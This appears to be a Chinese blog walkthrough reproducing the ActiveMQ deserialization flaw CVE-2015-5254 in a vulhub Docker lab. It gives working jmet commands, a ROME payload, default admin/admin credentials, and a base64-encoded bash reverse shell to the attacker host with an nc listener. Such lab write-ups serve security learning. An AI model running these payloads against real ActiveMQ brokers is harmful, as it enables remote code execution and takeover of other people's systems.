ActiveMQ反序列化漏洞原理+复现

最新推荐文章于 2024-02-26 13:55:20 发布
最新推荐文章于 2024-02-26 13:55:20 发布
阅读量2k 收藏 5
点赞数 1
分类专栏: 渗透测试 Vulnhub 文章标签: java-activemq activemq java 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40345591/article/details/129415899
版权

ActiveMQ反序列化漏洞

ActiveMQ

ActiveMQ是开源消息总线,消息中间件

工作原理

通过使用消息队列,实现服务的异步处理,主要目的是减少请求响应时间和解耦合。

消息队列,服务器A将客户发起的请求放入服务器B的消息队列中,服务器B从消息队列中取出并处理。

从以上内容中可以看出,消息中间件的主要功能就是为了解耦合、消峰和异步,即解决高并发问题和系统间的RPC交互繁杂问题。

漏洞原理

此漏洞源于程序没有限制可在代理中序列化的类。远程攻击这可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

解释说明

ActiveMQ通过消息队列来实现信息传递,每个消息要保证发出端和接收端格式相同,其中使用了序列化的方法进行传递,在这个过程中没有限制可在代理中序列化的类,这时候我们就可以自己构造一份序列化的恶意代码payload,将其作为事件发到ActiveMQ服务上,在管理员在后台管理时触发了payload,或者攻击者使用弱口令拿到ActiveMQ的账户,并执行了payload,则可以成功利用该漏洞

使用限制
  1. ActiveMQ的版本<=5.13.0
  2. payload需要主动触发
漏洞复现
实验配置

靶机地址:192.168.27.128:

攻击机:192.168.27.129

创建容器

ps:如果没有安装好docker请看上篇文章

cd vulhub

cd /activemq/CVE-2015-5254

docker-compose up -d

环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。

测试靶机

用攻击机访问靶机ip:8161,查看是否开启成功

在这里插入图片描述

看到如下页面,则说明安装成功

漏洞利用
  1. ysoserial是java反序列化利用的工具之一,其中集合了各种java反序列化的payload
  2. jmet集成了ysoserial,所以我们只需要安装jmet即可
  3. 将序列化对象作为一个消息,发送给目标61616工作端口
  4. 访问web管理页面,读取消息,触发漏洞
安装jmet

cd /opt

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

mkdir external

在这里插入图片描述

直接输入到终端即可

构造测试payload

java -jar jmet-0.1.0-all.jar -Q chenevent -I ActiveMQ -s -Y “touch /tmp/chen.txt” -Yp ROME 192.168.27.128 61616

使用ROME payload 把touch /tmp/chen.txt 命令序列化后作为名为chenevent的消息发给ActiveMQ

-Q 指定消息名

-I 选择要装载的JMS客户端

-s 选择ysoserial paylad

-Y 指定命令

-Yp 指定payload

最后是ip与端口

在这里插入图片描述

打开web页面

账号密码都是admin

如图操作

在这里插入图片描述
在这里插入图片描述

用靶机连接到docker容器,查看tmp目录下是否存在chen.txt

docker exec -it 容器id /bin/bash

docker ps 看容器id

在这里插入图片描述

看到chen.txt说明测试成功啦

终极目标!拿到shell

来个制作反弹shell的网站

https://www.revshells.com/

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yLBGey4w-1678327567182)(C:\Users\34232\AppData\Roaming\Typora\typora-user-images\image-20230309093515332.png)]

sh -i >& /dev/tcp/192.168.27.129/8023 0>&1

反弹shell一般都需要加密,咱就base64一下

base64加密网站:http://www.jsons.cn/base64/

c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yNy4xMjkvODAyMyAwPiYx

构建payload

和上面测试payload一样,将命令替换即可

java -jar jmet-0.1.0-all.jar -Q chenevent -I ActiveMQ -s -Y “bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yNy4xMjkvODAyMyAwPiYx}|{base64,-d}|{bash,-i}” -Yp ROME 192.168.27.128 61616

攻击机先开启端口监听,监听8023端口

nc -lvnp 8023

然后开新终端输入payload,靶机模拟管理员点击事件

在这里插入图片描述

成功拿到shell!

白帽Chen_D
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ActiveMQ高可用集群(ZooKeeper+LevelDB)安装、配置(伪集群).docx
10-20
ActiveMQ高可用集群(ZooKeeper+LevelDB)安装、配置(伪集群)
[应用安全]之ActiveMQ漏洞利用方法总结
zhang8907xiaoyue的博客
03-22 7125
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。ActiveMQ 是一个完全支持JMS1.1和J2EE 1.4规范的 JMS Provider实现,尽管JMS 应用介绍 Apache ActiveMQ是Apache软件基金会所研发的开放源代码
ActiveMQ 任意文件写入漏洞 getshell (CVE-2016-3088)——漏洞复现
W小哥
11-11 4730
一、ActiveMQ 漏洞介绍 1.1、ActiveMQ 简介 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现
RabbitMQ开启TLS支持,解决AMQP明文身份验证漏洞
最新发布
创意程序员的博客
02-26 1671
随着网络通信安全性的日益重要,我们不难发现,在企业级应用中,数据传输的安全防护措施已经成为不可或缺的一环。近期,不少使用RabbitMQ的开发团队收到了关于“远程主机允许明文身份验证”的漏洞警告。为确保敏感信息的安全传递,启用TLS(Transport Layer Security)支持成为了关键的解决方案。本文将详细介绍如何在RabbitMQ中启用TLS加密,以及在SpringBoot应用中配置TLS并设置EXTERNAL认证,通过实际操作步骤解决明文身份验证漏洞
【vulhub】ActiveMQ反序列化漏洞复现学习 CVE-2015-5254
Sulpice92的博客
12-27 926
关于CVE-2015-5254漏洞复现学习,不算详细,但尽可能写了我觉得有意义的内容。
Apache activeMQ漏洞复现
Shanfenglan's blog
12-14 3151
文章目录1. ActiveMQ 反序列化漏洞(CVE-2015-5254)2. ActiveMQ任意文件写入漏洞(CVE-2016-3088)2.1 利用参考文章 1. ActiveMQ 反序列化漏洞(CVE-2015-5254) Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 工具下载地址:http
ActiveMQ漏洞总结
qq_42176207的博客
05-08 7538
ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。 Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 Ac
activemq系列漏洞复现
m0_49420271的博客
06-07 2714
vulhub中activemq系列漏洞复现
记一次ActiveMQ漏洞利用
未完成的歌~的博客
08-25 760
Apache ActiveMQ 是 Apache 软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务、集群、Spring Framework 等。随着中间件的启动,会打开两个端口,61616 是工作端口,消息在这个端口进行传递;8161 是 Web 管理控制台。
[Vulhub] ActiveMQ漏洞
weixin_45605352的博客
01-10 3452
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 0x00 漏洞描述 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.13.0 之前的 5.x 版本安全漏洞,该程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java Message Service (JMS) ObjectMessage 对象,利用该漏洞执行任意代码。
漏洞分析|Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)
xuandaoren的博客
10-31 3383
Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。类, 然后重写对应的逻辑,这样在运⾏的时候, 因为。查找顺序的问题, 程序就会优先使⽤当前源码⽬录⾥的。获取到了对应的序列化器之后, 会调⽤它的。⾥⾯获取对应的序列化器。
ActiveMQ高可用集群(ZooKeeper+LevelDB)安装、配置、高可用测试.docx
10-20
ActiveMQ高可用集群(ZooKeeper+LevelDB)安装、配置、高可用测试
ActiveMQ反序列化漏洞(CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ反序列化漏洞(CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
P2P网络借贷平台项目SSH+Redis+ActiveMQ+POI+Shiro+AngularJS+Nginx+Quartz等
04-26
1、项目整体采用Maven分模块构建、SVN版本控制、PowerDesigner数据建模,基于约定标准的项目工程结构,同时讲解了很多主流Maven插件的使用配置。 2、前端页面采用流行的bootstrap、 angularjs 等流行的前端技术,通过本项目可以掌握 angularjs 的前端的MVC分层设计理念。 3、该项目采用了struts2 hibernate spring和 spring data jpa 开源框架完成,并融入了cxf开源webservice框架的应用,而这些技术都是当下流行的技术。 4、在缓存方面运用了互联网的流行技术redis实现缓存存贮,通过本项目可以理解redis在实际运用中的优势。 5、会员认证通过短信平台发送手机短信流行的认证方式,可以深刻理解手机验证码发送功能的实现。 6、会员认证短信采用MQ消息队列的机制进行发送,通过此功能可以学习MQ消息队列的应用。 7、资产统计模块结合了highchart前度图表技术。 8、登录通过cxf实习restful风格的webservice进行登录认证,从而深入的学习关于webservice的理念及RESTFUL风格的接口实现。 9、用POI实现对数据的导入导出功能,及POI对excel的操作。 10、后台权限采用流行的shiro权限管理框架,通过本项目可以深入了解shiro权限框架的应用及原理。 11、项目部署采用tomcat+Nginx的集群部署方式,在部署过程中可以深刻体会到nginx在负载均衡中发挥的优势。
activeMQ消息发送过程与原理浅析
02-24
本文来自于csdn,本文重点分析使用JMS向activeMQ中间件发送消息的过程分析,希望对您的学习有所帮助。activeMQ发送消息客户端发送消息分为同步发送与异步发送同步发送,发送者发送一条消息会阻塞直到broker反馈一个确认消息给发送者,表示消息已经被broker处理。这个机制提供了消息的安全性保障,由于是阻塞的操作,会影响到客户端消息发送的性能。异步发送,发送者不需要等待broker提供反馈给发送者,性能相对较高。但是可能会出现消息丢失的情况。所以使用异步发送的前提是在某些情况下允许出现数据丢失的情况。那么在什么情况下选择同步发生,什么情况下是选择异步发送呢?除去我们人为设置的方式,
ActiveMQ in Action pdf英文版+源代码
12-13
ActiveMQ in Action pdf英文原版加源代码压缩包。 Apache ActiveMQ in Action is a thorough, practical guide to implementing message-oriented systems in Java using ActiveMQ. The book lays out the core of ActiveMQ in clear language, starting with the anatomy of a JMS message and moving quickly through connectors, message persistence, authentication and authorization. With the basics well in hand, you move into interesting examples of ActiveMQ at work, following a running Stock Portfolio application. You'll integrate ActiveMQ with containers like Geronimo and JBoss and learn to tie into popular Java-based technologies like Spring Framework.
ActiveMQ 反序列化漏洞(CVE-2015-5254)利用工具
08-15
ActiveMQ 反序列化漏洞(CVE-2015-5254)利用工具,ActiveMQ漏洞反序列化漏洞,CVE-2015-5254,利用工具,工具
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
weixin_44047654的博客
11-25 2614
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
ActiveMQ 反序列化漏洞(CVE-2015-5254)
The code way of kinnisoy
10-24 1952
ActiveMQ 反序列化漏洞(CVE-2015-5254)
ActiveMQ 反序列化漏洞
08-19
ActiveMQ 反序列化漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ 的序列化和反序列化机制造成的。 攻击者可以构造恶意序列化对象,然后将其发送给 ActiveMQ 服务器。当服务器接收到恶意序列化对象并进行反序列化时,恶意代码就会被执行,从而导致系统受到攻击。 为了防止 ActiveMQ 反序列化漏洞的利用,可以采取以下措施: 1. 更新和升级:及时更新 ActiveMQ 版本,以获取最新的安全修复和漏洞修复。 2. 配置安全策略:通过配置 ActiveMQ 的安全策略来限制用户对序列化和反序列化的访问权限,只允许信任的类进行反序列化操作。 3. 输入验证和过滤:在接收到消息之前,对用户提交的数据进行严格的输入验证和过滤,确保只接受合法和可信的数据。 4. 序列化过滤:实施白名单机制,只允许特定的类进行反序列化操作,阻止未知类的反序列化。 5. 安全意识培训:加强对开发人员和系统管理员的安全意识培训,提高他们对反序列化漏洞的认识,以及如何正确地使用 ActiveMQ。 请注意,这些建议只是一些通用的防御措施,具体的安全配置和防护措施需要根据实际情况进行调整和实施。建议在使用 ActiveMQ 或其他中间件时,密切关注厂商的安全公告和最佳实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽Chen_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值